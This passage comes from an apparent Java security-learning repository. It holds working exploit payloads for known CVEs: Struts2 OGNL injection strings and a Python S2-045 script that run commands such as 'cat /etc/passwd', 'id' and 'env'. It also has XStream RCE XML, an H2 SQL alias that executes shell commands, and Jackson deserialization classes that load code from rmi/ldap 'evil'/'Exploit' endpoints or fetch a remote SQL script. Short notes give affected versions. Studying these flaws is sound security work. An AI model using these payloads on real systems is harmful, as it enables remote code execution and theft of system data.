"success" : "error"; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/Struts2-007简单分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/Struts2-007/Struts2-007简单分析.pdf -------------------------------------------------------------------------------- /Struts2/Struts2-007/UserAction-validation.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 1 9 | 150 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" contentType="text/html; charset=UTF-8" 2 | pageEncoding="UTF-8"%> 3 | <%@ taglib prefix="s" uri="/struts-tags" %> 4 | 5 | 6 | 7 | 8 | S2-007 9 | 10 | 11 |

S2-007 Demo

12 |

link: https://struts.apache.org/docs/s2-007.html

13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/struts.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 11 | 12 | 13 | 14 | 15 | 16 | /welcome.jsp 17 | /index.jsp 18 | /index.jsp 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /Struts2/Struts2-007/welcome.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" contentType="text/html; charset=UTF-8" 2 | pageEncoding="UTF-8"%> 3 | <%@ taglib prefix="s" uri="/struts-tags" %> 4 | 5 | 6 | 7 | 8 | S2-007 9 | 10 | 11 |

Name:

12 |

Email:

13 |

Age:

14 | 15 | 16 | -------------------------------------------------------------------------------- /Struts2/Struts2-009/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/Struts2-009/1.png -------------------------------------------------------------------------------- /Struts2/Struts2-012/README.md: -------------------------------------------------------------------------------- 1 | # Struts2-012 2 | 3 | ## 漏洞介绍 4 | 5 | 该漏洞是在`struts.xml`中使用了重定向类型,并且还使用 ${param_name} 作为重定向变量。当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。 6 | 7 | ## 漏洞版本 8 | 9 | 影响版本: 2.1.0 - 2.3.13 10 | 11 | 漏洞详情: http://struts.apache.org/docs/s2-012.html 12 | 13 | ## 配置文件内容 14 | 15 | `struts.xml` 16 | 17 | ```xml 18 | 19 | 20 | /index.jsp?name=${name} 21 | /index.jsp 22 | /index.jsp 23 | 24 | 25 | ``` 26 | 27 | ## poc 28 | 29 | ``` 30 | %{ 31 | #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(), 32 | #b=#a.getInputStream(), 33 | #c=new java.io.InputStreamReader(#b), 34 | #d=new java.io.BufferedReader(#c), 35 | #e=new char[50000], 36 | #d.read(#e), 37 | #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), 38 | #f.getWriter().println(new java.lang.String(#e)), 39 | #f.getWriter().flush(), 40 | #f.getWriter().close() 41 | } 42 | ``` 43 | ## 参考 44 | >https://github.com/vulhub/vulhub/blob/master/struts2/s2-012/README.zh-cn.md 45 | -------------------------------------------------------------------------------- /Struts2/Struts2-013/README.md: -------------------------------------------------------------------------------- 1 | # Struts2-013/014 2 | 3 | ## 漏洞介绍 4 | 5 | 在Struts2 的标签中`` 和 `` 都包含一个 includeParams 属性其值可设置为 none,get 或 all,参考官方其对应意义如下: 6 | 7 | 1. none - 链接不包含请求的任意参数值(默认) 8 | 2. get - 链接只包含 GET 请求中的参数和其值 9 | 3. 
all - 链接包含 GET 和 POST 所有参数和其值 10 | 11 | ``用来显示一个超链接,当`includeParams=all`的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。 12 | 13 | ## 漏洞版本 14 | 15 | 影响版本: 2.0.0 - 2.3.14.1 16 | 17 | 漏洞详情: 18 | 19 | - http://struts.apache.org/docs/s2-013.html 20 | - http://struts.apache.org/docs/s2-014.html 21 | 22 | ## poc 23 | 24 | ``` 25 | ${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())} 26 | 27 | // 或 28 | 29 | ${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())} 30 | ``` 31 | 32 | **url编码** 33 | 34 | ``` 35 | a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D 36 | ``` 37 | 38 | ## 参考 39 | 40 | >https://github.com/vulhub/vulhub/blob/master/struts2/s2-013/README.zh-cn.md 41 | -------------------------------------------------------------------------------- /Struts2/Struts2-045/README.md: -------------------------------------------------------------------------------- 1 | # S2-045 远程代码执行漏洞(CVE-2017-5638) 2 | 影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 3 | 4 | 简单的说就是在处理Content-Type的post请求的时候使用了ognl表达式注入。注意Content-Type:必须含有multipart/form-data, 5 | ## poc 6 | ```python 7 | import requests 8 | 9 | url = "" 10 | headers={ 11 | 
'Content-Type':'''"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='env').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}".multipart/form-data''' 12 | } 13 | re = requests.post(url,headers=headers) 14 | print(re.text) 15 | ``` 16 | -------------------------------------------------------------------------------- /Struts2/img/README.md: -------------------------------------------------------------------------------- 1 | # 照片 2 | -------------------------------------------------------------------------------- /Struts2/img/环境.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Struts2/img/环境.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815001234456.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815001234456.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815103726507.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815103726507.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815103750342.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815103750342.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815110026954.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815110026954.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815110029190.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815110029190.png -------------------------------------------------------------------------------- /Weblogic/img/image-20210815153940829.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Weblogic/img/image-20210815153940829.png -------------------------------------------------------------------------------- /Xstream/exp/CSRF/CVE-2021-21349.xml: -------------------------------------------------------------------------------- 1 | no find... -------------------------------------------------------------------------------- /Xstream/exp/DOS/CVE-2017-7957.xml: -------------------------------------------------------------------------------- 1 | no find... 
-------------------------------------------------------------------------------- /Xstream/exp/DOS/CVE-2021-21348.xml: -------------------------------------------------------------------------------- 1 | no find... -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2013-7285-2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | fookey 4 | foovalue 5 | 6 | 7 | 8 | java.lang.Comparable 9 | 10 | 11 | 12 | calc.exe 13 | 14 | 15 | start 16 | 17 | 18 | good 19 | 20 | -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2013-7285.xml: -------------------------------------------------------------------------------- 1 | 2 | foo 3 | 4 | java.lang.Comparable 5 | 6 | 7 | 8 | cmd 9 | /C 10 | calc 11 | 12 | 13 | start 14 | 15 | 16 | -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2019-10173.xml: -------------------------------------------------------------------------------- 1 | 2 | foo 3 | 4 | java.lang.Comparable 5 | 6 | 7 | 8 | cmd 9 | /C 10 | calc 11 | 12 | 13 | start 14 | 15 | 16 | -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2021-21346.xml: -------------------------------------------------------------------------------- 1 | no find... -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2021-21347.xml: -------------------------------------------------------------------------------- 1 | no find.. -------------------------------------------------------------------------------- /Xstream/exp/RCE/CVE-2021-21350.xml: -------------------------------------------------------------------------------- 1 | no find.. 
-------------------------------------------------------------------------------- /Xstream/exp/XXE/CVE-2016-3674.xml: -------------------------------------------------------------------------------- 1 | no find.. -------------------------------------------------------------------------------- /jackson/inject.sql: -------------------------------------------------------------------------------- 1 | CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException { 2 | String[] command = {"cmd", "/c", cmd}; 3 | Runtime.getRuntime().exec(command) 4 | } 5 | $$; 6 | CALL SHELLEXEC('calc') -------------------------------------------------------------------------------- /jackson/jackson.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2019_12086.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | 5 | import java.io.IOException; 6 | import java.sql.SQLException; 7 | 8 | public class CVE_2019_12086 { 9 | //任意文件读取com.fasterxml.jackson.core <2.9.9 10 | public static void main(String[] args) throws SQLException, IOException { 11 | ObjectMapper mapper = new ObjectMapper(); 12 | mapper.enableDefaultTyping(); 13 | //开启 enableDefaultTyping ,使用构造方法反序列化的方式反序列化 MiniAdmin 类 14 | String json = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://127.0.0.1:3307/?user=flag\"]"; 15 | mapper.readValue(json, Object.class); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2019_12384.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | import 
java.io.IOException; 5 | 6 | public class CVE_2019_12384 { 7 | //H2Rce 8 | public static void main(String[] args) throws IOException { 9 | ObjectMapper objectMapper = new ObjectMapper(); 10 | objectMapper.enableDefaultTyping();//开启 defaultTyping 11 | String json = " [\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:file:~/.h2/test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CALL SHELLEXEC('calc');\"}]"; 12 | Object o = objectMapper.readValue(json, Object.class);//反序列化对象 13 | String s = objectMapper.writeValueAsString(o);// 14 | 15 | //"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", "+"{\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8999/inject.sql'\"}]"; 16 | 17 | // ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:file:~/.h2/test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd)\\; }$$;"}] 18 | //同样使用文件存储模式,执行 CALL 命令调用函数 这样就省去了再去调用远程文件的问题 19 | // ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:file:~/.h2/test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CALL SHELLEXEC('calc');"}] 20 | 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2019_12814.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | import org.jdom2.transform.XSLTransformException; 5 | import org.jdom2.transform.XSLTransformer; 6 | 7 | import java.io.IOException; 8 | 9 | public class CVE_2019_12814 { 10 | //JDOM 11 | public static void main(String[] args) throws XSLTransformException { 12 | //XSLTransformer xslTransformer = new XSLTransformer("http://127.0.0.1:8999/hello"); 13 | String payload = "[\"org.jdom2.transform.XSLTransformer\", \"http://127.0.0.1:1234/exp.xml\"]"; 14 | 
ObjectMapper mapper = new ObjectMapper(); 15 | mapper.enableDefaultTyping(); 16 | try { 17 | Object object = mapper.readValue(payload, Object.class); 18 | } catch (IOException e) { 19 | e.printStackTrace(); 20 | } 21 | } 22 | /** 23 | * https://www.mi1k7ea.com/2019/11/24/Jackson%E7%B3%BB%E5%88%97%E5%85%AD%E2%80%94%E2%80%94CVE-2019-12814%EF%BC%88%E5%9F%BA%E4%BA%8EJDOM-XSLTransformer%E5%88%A9%E7%94%A8%E9%93%BE%EF%BC%89/ 24 | * OWASP推荐的防御XXE的setFeature()要设置下面几个值: 25 | * factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 26 | * factory.setFeature("http://xml.org/sax/features/external-general-entities", false); 27 | * factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 28 | * factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 29 | */ 30 | 31 | } 32 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2019_14439.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | 5 | import java.io.IOException; 6 | 7 | public class CVE_2019_14439 { 8 | public static void main(String[] args) throws IOException { 9 | String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\",{\"jndiLocation\":\"rmi://127.0.0.1:1088/evil\"}]"; 10 | ObjectMapper mapper = new ObjectMapper(); 11 | mapper.enableDefaultTyping(); 12 | Object o = mapper.readValue(json, Object.class); 13 | mapper.writeValueAsString(o);//调用所有个 get 方法 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2020_35490.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | 5 | import java.io.IOException; 6 | 7 | 
public class CVE_2020_35490 { 8 | public static void main(String[] args) throws IOException { 9 | ObjectMapper mapper = new ObjectMapper(); 10 | mapper.enableDefaultTyping(); 11 | String payload = "[\"com.nqadmin.rowset.JdbcRowSetImpl\",{\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",\"autoCommit\":\"true\"}]"; 12 | 13 | Object o = mapper.readValue(payload, Object.class); 14 | mapper.writeValueAsString(o); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/CVE_2020_36187.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.cve; 2 | 3 | import com.fasterxml.jackson.databind.ObjectMapper; 4 | 5 | import java.io.IOException; 6 | 7 | public class CVE_2020_36187 { 8 | public static void main(String[] args) throws IOException { 9 | ObjectMapper mapper = new ObjectMapper(); 10 | mapper.enableDefaultTyping(); 11 | String payload = "[\"com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource\",{\"jndiLocation\":\"ldap://127.0.0.1:1389/Exploit\"}]"; 12 | Object o = mapper.readValue(payload, Object.class); 13 | mapper.writeValueAsString(o); 14 | } 15 | } -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/cve/黑名单.txt: -------------------------------------------------------------------------------- 1 | com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator 2 | 3 | https://b1ue.cn/archives/189.html -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/learn/Man.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.learn; 2 | 3 | public class Man { 4 | public int age; 5 | public String name; 6 | 7 | public Man(){ 8 | System.out.println("无参数构造方法"); 9 | } 10 | 11 | public Man(int age, String name) { 12 | 
System.out.println("有参数构造方法"); 13 | this.age = age; 14 | this.name = name; 15 | } 16 | public int getAge() { 17 | return age; 18 | } 19 | public void setAge(int age) { 20 | this.age = age; 21 | } 22 | 23 | public String getName() { 24 | System.out.println("get方法"); 25 | return name; 26 | } 27 | 28 | public void setName(String name) { 29 | System.out.println("set方法"); 30 | this.name = name; 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/learn/test.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.learn; 2 | 3 | import com.fasterxml.jackson.annotation.JsonInclude; 4 | import com.fasterxml.jackson.databind.ObjectMapper; 5 | 6 | import java.io.IOException; 7 | 8 | public class test { 9 | public static void main(String[] args) throws IOException { 10 | // 序列化 11 | ObjectMapper objectMapper = new ObjectMapper(); 12 | objectMapper.enableDefaultTyping(); 13 | Man man = new Man(12, "哈哈"); 14 | String jsonString = objectMapper.writeValueAsString(man);//get方法 15 | // 输出 16 | System.out.println(jsonString); 17 | //String poc = "{\"age\":12,\"name\":\"哈哈\"}"; 18 | //Object o = objectMapper.readValue(poc,Man.class);//反序列化 19 | //System.out.println(o); 20 | //String s = objectMapper.writeValueAsString(o);//序列化 21 | //System.out.println(s); 22 | 23 | //String jsonResult = "[\"com.firebasky.learn.test_poc\",\"test\"]"; 24 | //objectMapper.readValue(jsonResult,Object.class); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/learn/test_poc.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.learn; 2 | 3 | public class test_poc { 4 | public test_poc(){}; 5 | public test_poc(String name){ 6 | System.out.println(name); 7 | } 8 | public test_poc(int age){ 9 | System.out.println(age); 10 | } 
11 | public test_poc(String name,int age){ 12 | System.out.println(name+age); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /jackson/src/main/java/com/firebasky/self/hikaricp.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.self; 2 | 3 | 4 | import com.fasterxml.jackson.databind.ObjectMapper; 5 | 6 | import java.io.IOException; 7 | 8 | public class hikaricp { 9 | public static void main(String[] args) throws IOException { 10 | String json = "[\"com.zaxxer.hikari.HikariConfig\",{\"metricRegistry\":\"rmi://127.0.0.1:1088/evil\"}]"; 11 | ObjectMapper mapper = new ObjectMapper(); 12 | mapper.enableDefaultTyping(); 13 | Object o = mapper.readValue(json, Object.class); 14 | mapper.writeValueAsString(o);//调用所有个 get 方法 15 | } 16 | /** 17 | * https://curz0n.github.io/2019/09/20/cve-2019-14540/#3-%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC%E4%BF%AE%E5%A4%8D%E5%BB%BA%E8%AE%AE 18 | */ 19 | } 20 | -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_12086.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_12086.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_12384.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_12384.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_12814.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_12814.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_14379.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_14379.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2019_14439.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2019_14439.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2020_35490.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2020_35490.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/cve/CVE_2020_36187.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/cve/CVE_2020_36187.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/learn/Man.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/learn/Man.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/learn/test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/learn/test.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/learn/test_poc.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/learn/test_poc.class -------------------------------------------------------------------------------- /jackson/target/classes/com/firebasky/self/hikaricp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/jackson/target/classes/com/firebasky/self/hikaricp.class -------------------------------------------------------------------------------- /jackson/xxe/evil.dtd: -------------------------------------------------------------------------------- 1 | "> %all; 2 | -------------------------------------------------------------------------------- /jackson/xxe/exp.xml: -------------------------------------------------------------------------------- 1 | 3 | 4 | %remote; 5 | %send; 6 | ]> -------------------------------------------------------------------------------- /java-web/README.md: -------------------------------------------------------------------------------- 1 | # 关于javaweb的学习 2 | -------------------------------------------------------------------------------- /java-web/java安全之java-web.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java-web/java安全之java-web.pdf -------------------------------------------------------------------------------- /java-web/java文件漏洞检查.md: -------------------------------------------------------------------------------- 1 | 在IDEA中的项目中重点搜下如下文件读取的类。 2 | 3 | JDK原始的java.io.FileInputStream、java.io.FileInputStream类; 4 | JDK原始的java.io.RandomAccessFile类; 5 | Apache Commons IO提供的org.apache.commons.io.FileUtils类; 6 | JDK1.7新增的基于NIO非阻塞异步读取文件的java.nio.channels.AsynchronousFileChannel类; 7 | JDK1.7新增的基于NIO读取文件的java.nio.file.Files类。常用方法如:Files.readAllBytes、Files.readAllLines; 8 | java.io.File类的list、listFiles、listRoots、delete方法; 9 | 除此之外,还可以搜索一下FileUtil/FileUtils很有可能用户会封装文件操作的工具类。 10 | 11 | java.io.FileInputStream 12 | java.io.FileInputStream 13 | java.io.FileInputStream 14 | org.apache.commons.io.FileUtils 15 | java.nio.channels.AsynchronousFileChannel 16 | java.nio.file.Files 17 | Files.readAllBytes 18 | Files.readAllLines 19 | list 20 | listFiles 21 | listRoots 22 | delete 23 | FileUtil/FileUtils 24 | -------------------------------------------------------------------------------- /java内存马/Readme.md: -------------------------------------------------------------------------------- 1 | # java内存马 2 | 3 | + [awd shiro内存木马注入](https://github.com/KpLi0rn/ShiroVulnEnv) 4 | -------------------------------------------------------------------------------- /java内存马/Tomcat Filter/Readme.md: -------------------------------------------------------------------------------- 1 | # Tomcat Filter 2 | -------------------------------------------------------------------------------- /java内存马/Tomcat Filter/Tomcat Filter.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java内存马/Tomcat Filter/Tomcat Filter.rar 
-------------------------------------------------------------------------------- /java内存马/agent/java-agent学习.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java内存马/agent/java-agent学习.pdf -------------------------------------------------------------------------------- /java回显/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | 5 | For further reference, please consider the following sections: 6 | 7 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 8 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.5/maven-plugin/reference/html/) 9 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.5/maven-plugin/reference/html/#build-image) 10 | * [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.5/reference/htmlsingle/#boot-features-developing-web-applications) 11 | 12 | ### Guides 13 | 14 | The following guides illustrate how to use some features concretely: 15 | 16 | * [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) 17 | * [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) 18 | * [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) 19 | 20 | -------------------------------------------------------------------------------- /java回显/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.5.5 9 | 10 | 11 | com.firebasky 12 | echo 13 | 0.0.1-SNAPSHOT 14 | echo 15 | echo for java exec 16 | 17 | 1.8 18 | 19 | 20 | 21 | org.springframework.boot 22 | spring-boot-starter-web 23 | 24 | 25 | 26 | org.springframework.boot 27 | spring-boot-starter-test 28 
| test 29 | 30 | 31 | 32 | 33 | 34 | 35 | org.springframework.boot 36 | spring-boot-maven-plugin 37 | 38 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /java回显/src/main/java/com/firebasky/echo/EchoApplication.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.echo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class EchoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(EchoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /java回显/src/main/java/com/firebasky/echo/controller/demo.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.echo.controller; 2 | 3 | import org.springframework.web.bind.annotation.RequestMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | public class demo { 8 | @RequestMapping("/demo") 9 | public void demo() throws InterruptedException { 10 | new Alltomcat(); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /java回显/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /java回显/src/test/java/com/firebasky/echo/EchoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.echo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class EchoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 
| -------------------------------------------------------------------------------- /java安全基础/Java class文件格式.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java安全基础/Java class文件格式.pdf -------------------------------------------------------------------------------- /java安全基础/README.md: -------------------------------------------------------------------------------- 1 | # 介绍java的一些基础 2 | -------------------------------------------------------------------------------- /java安全基础/java内部类.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java安全基础/java内部类.pdf -------------------------------------------------------------------------------- /java安全基础/java反射.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/java安全基础/java反射.pdf -------------------------------------------------------------------------------- /java安全基础/java基础.pdf: 